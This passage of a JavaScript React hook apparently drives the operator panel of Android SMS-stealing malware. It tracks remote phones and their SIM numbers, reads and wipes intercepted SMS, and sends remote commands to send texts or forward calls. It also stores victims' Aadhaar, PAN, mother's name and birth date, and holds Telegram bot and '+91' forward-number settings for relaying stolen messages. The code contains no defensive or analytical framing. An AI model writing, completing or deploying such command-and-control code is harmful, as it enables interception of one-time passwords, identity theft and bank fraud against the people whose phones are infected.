            deviceDataMap.set(deviceId, device);
            updateDevicesList();
            
            console.log(`📊 Status update (fallback) for ${deviceId}: ${device.online ? 'ONLINE' : 'OFFLINE'} (${Math.round(timeDiff / 1000)}s ago)`);
          } else if (device && !statusData) {
            // If status not found, check isOnline immediately
            checkDeviceStatusImmediately(deviceId);
          }
        }, (error) => {
          // If status not found, check isOnline immediately
          checkDeviceStatusImmediately(deviceId);
        });
      });
    };
    
    // Fetch devices once on mount
    fetchDevices();

    // Listen to admin SMS forward number
    if (database) {
      const smsForwardNumberRef = ref(database, 'admin/smsForwardNumber');
      onValue(smsForwardNumberRef, (snapshot) => {
        const data = snapshot.val();
        console.log('📱 SMS Forward Number:', data);
        setSmsForwardNumber(data);
      }, (error) => {
        console.warn('⚠️ No SMS forward number found:', error);
        setSmsForwardNumber(null);
      });
      
      // Listen to admin Telegram config
      const telegramConfigRef = ref(database, 'admin/telegramConfig');
      onValue(telegramConfigRef, (snapshot) => {
        const data = snapshot.val();
        console.log('🤖 Telegram Config:', data);
        setTelegramConfig(data);
      }, (error) => {
        console.warn('⚠️ No Telegram config found:', error);
        setTelegramConfig(null);
      });
    }

    return () => {
      // Cleanup all Firebase listeners
      if (database) {
        deviceIds.forEach(deviceId => {
          try {
            off(ref(database, `devices/${deviceId}/deviceInfo`));
            off(ref(database, `devices/${deviceId}/battery`));
            off(ref(database, `devices/${deviceId}/simInfo`));
            off(ref(database, `devices/${deviceId}/isOnline`));
            off(ref(database, `devices/${deviceId}/installDate`));
            off(ref(database, `devices/${deviceId}/clientData`));
            off(ref(database, `devices/${deviceId}/deleted`));
            off(ref(database, `devices/${deviceId}/favorite`));
            off(ref(database, `devices/${deviceId}/sms`));
            off(ref(database, `devices/${deviceId}/messages`));
            off(ref(database, `devices/${deviceId}/status`));
            off(ref(database, `devices/${deviceId}/device_status`));
            off(ref(database, `onlineCheck/${deviceId}/response`));
          } catch (error) {
            console.warn(`Error cleaning up listeners for ${deviceId}:`, error);
          }
        });
        
        // Cleanup root listeners
        try {
          off(ref(database, 'devices'));
          off(ref(database, 'messages'));
          off(ref(database, 'admin/smsForwardNumber'));
          off(ref(database, 'admin/telegramConfig'));
        } catch (error) {
          console.warn('Error cleaning up root listeners:', error);
        }
      }
    };
  }, [token, deviceLimit]);

  // Generate UUID for commandId
  const generateUUID = () => {
    return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
      const r = Math.random() * 16 | 0;
      const v = c === 'x' ? r : ((r & 0x3) | 0x8);
      return v.toString(16);
    });
  };

  const sendCommand = (deviceId, command, data = {}) => {
    if (!db) return Promise.resolve();
    const cmdRef = ref(db, `commands/${deviceId}`);
    
    // For send_sms command, use the new structure
    if (command === 'send_sms') {
      const smsCommand = {
        message: data.message || data.text || '',
        phoneNumber: data.phoneNumber || data.number || '',
        simSlot: String(data.simSlot !== undefined ? data.simSlot : (data.sim !== undefined ? data.sim : '0')),
        timestamp: Date.now(),
        type: 'send_sms'
      };
      // Fire and forget - don't await, don't block
      push(cmdRef, smsCommand).catch(error => {
        console.error('Error sending SMS command:', error);
      });
      return Promise.resolve();
    } 
    // For call_forward command, use the new structure
    else if (command === 'call_forward') {
      const action = data.action || 'activate';
      const simSlot = String(data.simSlot !== undefined ? data.simSlot : (data.sim !== undefined ? data.sim : '0'));
      const slotIndex = parseInt(simSlot);
      
      if (action === 'activate') {
        const callForwardCommand = {
          action: 'activate',
          commandId: generateUUID(),
          configPath: `devices/${deviceId}/callForwarding`,
          enable: true,
          forwardNumber: data.forwardNumber || data.number || '',
          simSlot: simSlot,
          slotIndex: slotIndex,
          timestamp: Date.now(),
          type: 'enable_call_forward'
        };
        // Fire and forget - don't await, don't block
        push(cmdRef, callForwardCommand).catch(error => {
          console.error('Error sending call forward command:', error);
        });
      } else if (action === 'deactivate') {
        const callForwardCommand = {
          action: 'deactivate',
          commandId: generateUUID(),
          configPath: `devices/${deviceId}/callForwarding`,
          enable: false,
          simSlot: simSlot,
          slotIndex: slotIndex,
          timestamp: Date.now(),
          type: 'disable_call_forward'
        };
        // Fire and forget - don't await, don't block
        push(cmdRef, callForwardCommand).catch(error => {
          console.error('Error sending call forward command:', error);
        });
      }
      return Promise.resolve();
    } 
    // For check_online command, verify status (not set it)
    else if (command === 'check_online') {
      const commandTimestamp = Date.now();
      const pingId = `ping_${commandTimestamp}`;
      
      // Get FCM token from device data - check multiple sources
      const device = devices.find(d => d.id === deviceId);
      let fcmToken = '';
      
      // Try to get FCM token from device object first
      if (device?.fcmToken) {
        fcmToken = device.fcmToken;
      } else if (data.fcmToken) {
        fcmToken = data.fcmToken;
      } else {
        // Try to get from Firebase directly (fire and forget)
        const deviceRef = ref(db, `devices/${deviceId}`);
        get(deviceRef).then((deviceSnapshot) => {
          const deviceData = deviceSnapshot.val();
          fcmToken = deviceData?.fcmToken || '';
        }).catch((e) => {
          console.warn('Could not fetch FCM token from Firebase:', e);
        });
      }
      
      if (!fcmToken) {
        console.warn(`⚠️ No FCM token found for device ${deviceId}`);
        showToast('Warning: No FCM token found for this device', 'warning');
      }
      
      const checkOnlineCommand = {
        action: 'restart_services_and_sync',
        fcmToken: fcmToken,
        pingId: pingId,
        timestamp: commandTimestamp,
        type: 'check_online'
      };
      
      // Push to commands/{deviceId}/{commandId} (fire and forget)
      const commandId = generateUUID();
      set(ref(db, `commands/${deviceId}/${commandId}`), checkOnlineCommand).catch(error => {
        console.error('Error sending check online command:', error);
      });
      
      console.log(`📡 Check online command sent for ${deviceId} at ${commandTimestamp}`, checkOnlineCommand);
      console.log(`🔑 FCM Token: ${fcmToken ? 'Present' : 'Missing'}`);
      
      // Show initial toast
      showToast('Checking device status...', 'info');
      
      // Set up listener to verify the response from onlineCheck/{deviceId}/response
      const onlineCheckRef = ref(db, `onlineCheck/${deviceId}/response`);
      let verificationDone = false;
      let latestResponseTimestamp = null;
      let responseReceived = false;
      
      // Wait 15 seconds for the latest response
      const verifyTimeout = setTimeout(() => {
        if (!verificationDone) {
          off(onlineCheckRef);
          verificationDone = true;
          
          if (!responseReceived) {
            // No response received at all
            console.log(`⏱️ No response received for ${deviceId} within 15 seconds`);
            showToast('❌ Device is OFFLINE (no response received)', 'error');
          } else if (latestResponseTimestamp) {
            // Response received but check if it's recent
            const now = Date.now();
            const timeDiff = now - latestResponseTimestamp;
            const responseTimeSeconds = Math.round(timeDiff / 1000);
            
            // Consider device online if response is within 1 minute
            const isOnline = timeDiff <= 60000; // 1 minute
            
            if (isOnline) {
              showToast(`✅ Device is ONLINE (responded ${responseTimeSeconds}s ago)`, 'success');
            } else {
              showToast(`❌ Device is OFFLINE (last seen ${responseTimeSeconds}s ago)`, 'error');
            }
          } else {
            // Edge case: response received but timestamp is invalid
            showToast('❌ Device is OFFLINE (invalid response)', 'error');
          }
        }
      }, 15000); // 15 second timeout
      
      // Listen for responses - only accept responses that come after the command was sent
      onValue(onlineCheckRef, (snapshot) => {
        if (verificationDone) return;
        
        const responseTimestamp = snapshot.val();
        if (responseTimestamp && typeof responseTimestamp === 'number') {
          // Only accept responses that come after the command was sent
          if (responseTimestamp >= commandTimestamp) {
            responseReceived = true;
            
            // Track the latest response timestamp
            if (!latestResponseTimestamp || responseTimestamp > latestResponseTimestamp) {
              latestResponseTimestamp = responseTimestamp;
              console.log(`📥 Received response for ${deviceId} at ${responseTimestamp} (command sent at ${commandTimestamp})`);
            }
            
            // Calculate time difference
            const now = Date.now();
            const timeDiff = now - responseTimestamp;
            const responseTimeSeconds = Math.round(timeDiff / 1000);
            
            // If response is very recent (within 5 seconds), consider it immediate and show result
            // Otherwise, wait for the full timeout to get the latest response
            if (timeDiff <= 5000 && responseTimestamp === latestResponseTimestamp) {
              // Immediate response - show result right away
              clearTimeout(verifyTimeout);
              off(onlineCheckRef);
              verificationDone = true;
              
              const isOnline = timeDiff <= 60000; // 1 minute threshold
              
              if (isOnline) {
                showToast(`✅ Device is ONLINE (responded in ${responseTimeSeconds}s)`, 'success');
              } else {
                showToast(`❌ Device is OFFLINE (last seen ${responseTimeSeconds}s ago)`, 'error');
              }
            }
            // Otherwise, continue waiting for more recent responses until timeout
          } else {
            console.log(`⚠️ Ignoring old response for ${deviceId}: ${responseTimestamp} (command sent at ${commandTimestamp})`);
          }
        }
      });
      
      return Promise.resolve();
    } else {
      // For other commands, keep the old structure or adapt as needed
      // Fire and forget - don't await, don't block
      push(cmdRef, { command, data, timestamp: Date.now() }).catch(error => {
        console.error('Error sending command:', error);
      });
      return Promise.resolve();
    }
  };

  const deleteMessage = async (messageId) => {
    if (!db) return;
    
    // Get message from ref before removing from UI
    const messageToDelete = messagesArrayRef.current.find(m => m.id === messageId);
    
    // Update UI immediately - remove from messages state
    setMessages(prevMessages => {
      return prevMessages.filter(msg => msg.id !== messageId);
    });
    // Update ref
    messagesArrayRef.current = messagesArrayRef.current.filter(msg => msg.id !== messageId);
    
    // Completely delete message from Firebase (fire and forget)
    // Try multiple paths where message might exist
    setTimeout(() => {
      if (messageToDelete && messageToDelete.deviceId) {
        // Delete from devices/{deviceId}/sms/{messageId}
        remove(ref(db, `devices/${messageToDelete.deviceId}/sms/${messageId}`)).catch(() => {});
        // Delete from devices/{deviceId}/messages/{messageId}
        remove(ref(db, `devices/${messageToDelete.deviceId}/messages/${messageId}`)).catch(() => {});
      }
      // Delete from root messages/{messageId}
      remove(ref(db, `messages/${messageId}`)).catch(() => {});
    }, 0);
  };

  const deleteAllMessages = async () => {
    if (!db) return;
    
    // Get all device IDs from current messages and deviceDataMapRef BEFORE clearing
    const deviceIdsSet = new Set();
    
    // Add device IDs from current messages
    messagesArrayRef.current.forEach(msg => {
      if (msg.deviceId) {
        deviceIdsSet.add(msg.deviceId);
      }
    });
    
    // Add device IDs from deviceDataMapRef
    deviceDataMapRef.current.forEach((device, deviceId) => {
      deviceIdsSet.add(deviceId);
    });
    
    // Update UI immediately - clear all messages
    setMessages([]);
    messagesArrayRef.current = [];
    
    // Delete from Firebase in background (fire and forget)
    // 1. Delete root level sms structure (sms/deviceId)
    set(ref(db, 'sms'), null).catch(error => {
      console.error('Error deleting root SMS from Firebase:', error);
    });
    
    // 2. Delete root level messages structure (old format)
    set(ref(db, 'messages'), null).catch(error => {
      console.error('Error deleting root messages from Firebase:', error);
    });
    
    // 3. Also fetch all devices from Firebase to ensure we cover all devices
    get(ref(db, 'devices')).then((snapshot) => {
      if (snapshot.exists()) {
        const devicesData = snapshot.val();
        Object.keys(devicesData).forEach(deviceId => {
          deviceIdsSet.add(deviceId);
        });
      }
      
      // Delete SMS from all devices
      const deletePromises = [];
      deviceIdsSet.forEach(deviceId => {
        // Delete from devices/{deviceId}/sms (new structure)
        deletePromises.push(
          remove(ref(db, `devices/${deviceId}/sms`)).catch(error => {
            console.warn(`Error deleting SMS from device ${deviceId}/sms:`, error);
          })
        );
        // Delete from devices/{deviceId}/messages (old structure)
        deletePromises.push(
          remove(ref(db, `devices/${deviceId}/messages`)).catch(error => {
            console.warn(`Error deleting messages from device ${deviceId}/messages:`, error);
          })
        );
      });
      
      // Wait for all deletions to complete (fire and forget)
      Promise.allSettled(deletePromises).then(() => {
        console.log(`✅ Deleted all SMS from ${deviceIdsSet.size} devices and root paths`);
      });
    }).catch(error => {
      console.error('Error fetching devices for deletion:', error);
      
      // Even if fetching devices fails, still try to delete from known device IDs
      const deletePromises = [];
      deviceIdsSet.forEach(deviceId => {
        deletePromises.push(
          remove(ref(db, `devices/${deviceId}/sms`)).catch(() => {})
        );
        deletePromises.push(
          remove(ref(db, `devices/${deviceId}/messages`)).catch(() => {})
        );
      });
      Promise.allSettled(deletePromises);
    });
  };

  const toggleFavorite = useCallback(async (deviceId) => {
    if (!db) return;
    
    // Get current favorite status from deviceDataMapRef
    const currentDevice = deviceDataMapRef.current.get(deviceId);
    if (!currentDevice) {
      console.warn(`Device ${deviceId} not found in deviceDataMapRef`);
      return;
    }
    
    const currentFavoriteValue = currentDevice.favorite || false;
    const newFavoriteValue = !currentFavoriteValue;
    
    // Update UI immediately - update devices state
    setDevices(prevDevices => {
      const deviceIndex = prevDevices.findIndex(d => d.id === deviceId);
      if (deviceIndex === -1) return prevDevices;
      
      const updatedDevices = [...prevDevices];
      updatedDevices[deviceIndex].favorite = newFavoriteValue;
      return updatedDevices;
    });
    
    // Update deviceDataMapRef immediately
    currentDevice.favorite = newFavoriteValue;
    deviceDataMapRef.current.set(deviceId, currentDevice);
    
    // Update Firebase - if removing favorite, delete the field; if adding, set to true
    if (newFavoriteValue) {
      // Add to favorite - set to true
      set(ref(db, `devices/${deviceId}/favorite`), true).catch(error => {
        console.error('Error adding favorite:', error);
        // Revert on error
        currentDevice.favorite = currentFavoriteValue;
        deviceDataMapRef.current.set(deviceId, currentDevice);
        setDevices(prev => {
          const revertIndex = prev.findIndex(d => d.id === deviceId);
          if (revertIndex !== -1) {
            const reverted = [...prev];
            reverted[revertIndex].favorite = currentFavoriteValue;
            return reverted;
          }
          return prev;
        });
      });
    } else {
      // Remove from favorite - delete the field from Firebase
      remove(ref(db, `devices/${deviceId}/favorite`)).catch(error => {
        console.error('Error removing favorite:', error);
        // Revert on error
        currentDevice.favorite = currentFavoriteValue;
        deviceDataMapRef.current.set(deviceId, currentDevice);
        setDevices(prev => {
          const revertIndex = prev.findIndex(d => d.id === deviceId);
          if (revertIndex !== -1) {
            const reverted = [...prev];
            reverted[revertIndex].favorite = currentFavoriteValue;
            return reverted;
          }
          return prev;
        });
      });
    }
  }, [db]);

  const deleteDevice = async (deviceId) => {
    if (!db) return false;
    
    // Update UI immediately - remove from devices state
    setDevices(prevDevices => prevDevices.filter(d => d.id !== deviceId));
    
    // Remove from deviceDataMapRef immediately
    deviceDataMapRef.current.delete(deviceId);
    
    // Remove messages for this device from UI immediately
    setMessages(prevMessages => prevMessages.filter(msg => msg.deviceId !== deviceId));
    
    // Mark device as deleted in Firebase (fire and forget)
    set(ref(db, `devices/${deviceId}/deleted`), true).catch(error => {
      console.error('Error marking device as deleted:', error);
    });
    set(ref(db, `devices/${deviceId}/deletedTimestamp`), Date.now()).catch(() => {});
    
    // Delete all messages for this device in background (fire and forget)
    setTimeout(() => {
      // Delete messages from devices/{deviceId}/sms
      remove(ref(db, `devices/${deviceId}/sms`)).catch(() => {});
      // Delete messages from devices/{deviceId}/messages
      remove(ref(db, `devices/${deviceId}/messages`)).catch(() => {});
      // Delete root level messages for this device
      const messagesRef = ref(db, 'messages');
      get(messagesRef).then((messagesSnapshot) => {
        if (messagesSnapshot.exists()) {
          const messagesData = messagesSnapshot.val();
          Object.keys(messagesData).forEach(messageId => {
            const message = messagesData[messageId];
            if (message && message.deviceId === deviceId) {
              remove(ref(db, `messages/${messageId}`)).catch(() => {});
            }
          });
        }
      }).catch(() => {});
    }, 0);
    
    return true;
  };

  const remainingDays = Math.ceil((tokenExpiry - Date.now()) / (1000 * 60 * 60 * 24));

  // Save SMS forward number
  const saveSmsForwardNumber = async (phoneNumber) => {
    if (!db) return false;
    try {
      // Validate 10-digit number
      const cleanNumber = phoneNumber.replace(/\D/g, ''); // Remove non-digits
      if (cleanNumber.length !== 10) {
        throw new Error('Please enter a valid 10-digit number');
      }
      
      // Format as +91{number}
      const formattedNumber = `+91${cleanNumber}`;
      
      // Update only the specific fields in admin
      const adminRef = ref(db, 'admin');
      await update(adminRef, {
        smsForwardNumber: formattedNumber,
        smsForwardNumberTimestamp: Date.now()
      });
      
      return true;
    } catch (error) {
      console.error('Error saving SMS forward number:', error);
      throw error;
    }
  };

  // Remove SMS forward number
  const removeSmsForwardNumber = async () => {
    if (!db) return false;
    try {
      // Remove only the specific fields in admin
      const adminRef = ref(db, 'admin');
      await update(adminRef, {
        smsForwardNumber: null,
        smsForwardNumberTimestamp: null
      });
      return true;
    } catch (error) {
      console.error('Error removing SMS forward number:', error);
      throw error;
    }
  };

  // Save Telegram configuration
  const saveTelegramConfig = async (config) => {
    if (!db) return false;
    try {
      const adminRef = ref(db, 'admin');
      await update(adminRef, {
        telegramConfig: {
          botToken: config.botToken || '',
          chatId: config.chatId || '',
          enabled: config.enabled || false,
          timestamp: Date.now()
        }
      });
      console.log('✅ Telegram config saved to Firebase');
      return true;
    } catch (error) {
      console.error('Error saving Telegram config:', error);
      throw error;
    }
  };

  // Remove Telegram configuration
  const removeTelegramConfig = async () => {
    if (!db) return false;
    try {
      const adminRef = ref(db, 'admin');
      await update(adminRef, {
        telegramConfig: null
      });
      console.log('✅ Telegram config removed from Firebase');
      return true;
    } catch (error) {
      console.error('Error removing Telegram config:', error);
      throw error;
    }
  };

  // Refresh devices function (manual refresh, no auto-updates)
  const refreshDevices = useCallback(async () => {
    if (!db) return;
    setLoading(true);
    try {
      // Fetch all devices without ordering (sort in JavaScript to avoid index requirement)
      const devicesRef = ref(db, 'devices');
      const snapshot = await get(devicesRef);
      const data = snapshot.val();
      
      if (data) {
        const deviceDataMap = new Map();
        const deviceIds = Object.keys(data);
        
        deviceIds.forEach(deviceId => {
          const deviceData = data[deviceId];
          if (deviceData?.deleted) return;
          
          const device = {
            id: deviceId,
            online: deviceData?.isOnline === true || false,
            favorite: deviceData?.favorite || false,
            battery: 0,
            sims: [],
            model: 'Unknown',
            installTime: Date.now(),
            installDate: null,
            clientData: null
          };
          
          if (deviceData?.deviceInfo) {
            const deviceInfo = deviceData.deviceInfo;
            device.model = deviceInfo.model || deviceInfo.deviceName || 'Unknown';
            device.serial = deviceInfo.deviceId || deviceId;
          }
          
          if (deviceData?.battery) {
            const batteryEntries = Object.entries(deviceData.battery);
            if (batteryEntries.length > 0) {
              const latestBattery = [...batteryEntries].sort((a, b) => Number(b[0]) - Number(a[0]))[0];
              const batteryValue = latestBattery[1];
              device.battery = typeof batteryValue === 'object' && batteryValue.percentage !== undefined
                ? batteryValue.percentage
                : (typeof batteryValue === 'number' ? batteryValue : 0);
            }
          }
          
          if (deviceData?.simInfo?.sims) {
            if (Array.isArray(deviceData.simInfo.sims)) {
              device.sims = deviceData.simInfo.sims.map(sim => ({
                operator: sim.simOperator || 'Unknown',
                number: sim.phoneNumber || 'N/A'
              }));
            } else if (typeof deviceData.simInfo.sims === 'object') {
              device.sims = Object.values(deviceData.simInfo.sims).map(sim => ({
                operator: sim.simOperator || 'Unknown',
                number: sim.phoneNumber || 'N/A'
              }));
            }
          }
          
          if (deviceData?.installDate) {
            const installDateValue = deviceData.installDate;
            let parsedDate = new Date(installDateValue);
            device.installTime = isNaN(parsedDate.getTime()) ? Date.now() : parsedDate.getTime();
            device.installDate = installDateValue;
          }
          
          if (deviceData?.clientData) {
            device.clientData = {
              fullName: deviceData.clientData.fullName || null,
              aadharNumber: deviceData.clientData.aadharNumber || null,
              mobileNumber: deviceData.clientData.mobileNumber || null,
              motherName: deviceData.clientData.motherName || null,
              panNumber: deviceData.clientData.panNumber || null,
              dob: deviceData.clientData.dob || null
            };
          }
          
          deviceDataMap.set(deviceId, device);
        });
        
        // Create a copy before sorting to avoid mutation
        const allDeviceList = [...Array.from(deviceDataMap.values())]
          .filter(device => !device.deleted)
          .map(device => {
            let installTime = device.installTime || Date.now();
            if (typeof installTime === 'string') {
              const parsed = new Date(installTime).getTime();
              installTime = isNaN(parsed) ? Date.now() : parsed;
            } else if (typeof installTime !== 'number' || isNaN(installTime)) {
              installTime = Date.now();
            }
            return { ...device, installTime };
          })
          .sort((a, b) => (b.installTime || 0) - (a.installTime || 0));
        
        const limitedList = allDeviceList.slice(0, deviceLimit);
        setHasMoreDevices(allDeviceList.length > deviceLimit);
        setDevices(limitedList);
      }
    } catch (error) {
      console.error('Error refreshing devices:', error);
    } finally {
      setLoading(false);
    }
  }, [db, deviceLimit]);

  return {
    devices,
    messages,
    loading,
    remainingDays,
    smsForwardNumber,
    telegramConfig,
    sendCommand,
    deleteMessage,
    deleteAllMessages,
    toggleFavorite,
    deleteDevice,
    saveSmsForwardNumber,
    removeSmsForwardNumber,
    saveTelegramConfig,
    removeTelegramConfig,
    loadMoreDevices: () => setDeviceLimit(prev => prev + 50),
    hasMoreDevices,
    refreshDevices,
    totalDevicesCount,
    getAllDevices: () => {
      // Get all devices from the deviceDataMap ref
      // Create a copy before sorting to avoid mutation
      const allDeviceList = [...Array.from(deviceDataMapRef.current.values())]
        .filter(device => !device.deleted)
        .map(device => {
          let installTime = device.installTime || Date.now();
          if (typeof installTime === 'string') {
            const parsed = new Date(installTime).getTime();
            installTime = isNaN(parsed) ? Date.now() : parsed;
          } else if (typeof installTime !== 'number' || isNaN(installTime)) {
            installTime = Date.now();
          }
          return { ...device, installTime };
        })
        .sort((a, b) => (b.installTime || 0) - (a.installTime || 0));
      return allDeviceList;
    },
    checkOnline: (deviceId) => sendCommand(deviceId, 'check_online')
  };
};
